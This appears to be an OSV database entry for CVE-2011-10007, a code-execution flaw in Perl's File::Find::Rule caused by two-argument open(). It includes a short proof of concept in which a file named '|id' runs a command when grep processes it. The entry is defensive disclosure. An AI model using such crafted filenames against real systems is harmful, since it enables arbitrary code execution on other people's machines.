CVE-2011-10007

Source
https://nvd.nist.gov/vuln/detail/CVE-2011-10007
Import Source
https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2011-10007.json
JSON Data
https://api.osv.dev/v1/vulns/CVE-2011-10007
Downstream
Related
Published
2025-06-05T12:15:22Z
Modified
2025-08-09T19:01:27Z
Summary
[none]
Details

File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when grep() encounters a crafted filename.

A file handle is opened with the 2 argument form of open() allowing an attacker controlled filename to provide the MODE parameter to open(), turning the filename into a command to be executed.

Example:

$ mkdir /tmp/poc; echo > "/tmp/poc/|id" $ perl -MFile::Find::Rule \     -E 'File::Find::Rule->grep("foo")->in("/tmp/poc")' uid=1000(user) gid=1000(user) groups=1000(user),100(users)

References

Affected packages